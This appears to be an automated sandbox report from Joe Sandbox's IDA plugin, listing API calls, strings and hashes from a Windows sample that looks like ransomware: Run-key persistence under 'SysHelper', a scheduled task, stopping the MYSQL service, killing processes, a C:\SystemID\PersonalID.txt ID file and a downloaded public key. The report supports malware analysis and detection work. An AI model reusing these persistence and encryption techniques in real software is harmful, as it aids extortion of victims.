                                                                                                • _memset.LIBCMT ref: 004123B6
                                                                                                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                • SysHelper, xrefs: 004123D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                • API String ID: 122392481-4165002228
                                                                                                • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                • String ID:
                                                                                                • API String ID: 1077091919-0
                                                                                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                • _memset.LIBCMT ref: 0040DC38
                                                                                                • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                • String ID: --Task$Comment$Time Trigger Task
                                                                                                • API String ID: 330603062-1376107329
                                                                                                • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                • String ID: MYSQL
                                                                                                • API String ID: 2359367111-1651825290
                                                                                                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                APIs
                                                                                                • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                • String ID: bad function call
                                                                                                • API String ID: 2464034642-3612616537
                                                                                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                • API String ID: 1717984340-2085858615
                                                                                                • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                APIs
                                                                                                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                • _memmove.LIBCMT ref: 0040C89F
                                                                                                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                • API String ID: 2864494435-54166481
                                                                                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                • String ID: cmd.exe
                                                                                                • API String ID: 2696918072-723907552
                                                                                                • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                • API String ID: 2574300362-2555811374
                                                                                                • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _malloc$__except_handler4_fprintf
                                                                                                • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                • API String ID: 1783060780-3771355929
                                                                                                • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                • API String ID: 909875538-2908105608
                                                                                                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue$OpenQuery
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                • API String ID: 3962714758-1667468722
                                                                                                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0041E707
                                                                                                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                • InternetOpenW.WININET ref: 0041E743
                                                                                                • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                • _memmove.LIBCMT ref: 0041E838
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                • _strstr.LIBCMT ref: 0041EA36
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                • _malloc.LIBCMT ref: 0041EB86
                                                                                                • _memset.LIBCMT ref: 0041EB94
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                • _strstr.LIBCMT ref: 0041EBDA
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                • API String ID: 2805819797-1771568745
                                                                                                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 1678825546-0
                                                                                                • Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                • Instruction ID: 52db3c5ac710bcba984e77d884e21c03200a6a5045cf61879664ec27deebefdc
                                                                                                • Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                • Instruction Fuzzy Hash: 27718471F092399BDF30DA58EC98BAAB7B5EF54314F5440DAD908A6241D7389EC0CF58
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                • API String ID: 1302938615-3129329331
                                                                                                • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                • String ID:
                                                                                                • API String ID: 2964551433-0
                                                                                                • Opcode ID: 24375c1184f10fff9f69e53d20d398cf7003ebcd556f5164746207377439a35e
                                                                                                • Instruction ID: 6e53a8d943180cd312645f9ab6be848b87d00e26e6c43e5a6b33f09903c19296
                                                                                                • Opcode Fuzzy Hash: 24375c1184f10fff9f69e53d20d398cf7003ebcd556f5164746207377439a35e
                                                                                                • Instruction Fuzzy Hash: AA515771F09139AFDF309A54DC99BAAB7B5EF04304F4400DAD908A6251D7799F80CF59
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                • String ID:
                                                                                                • API String ID: 2964551433-0
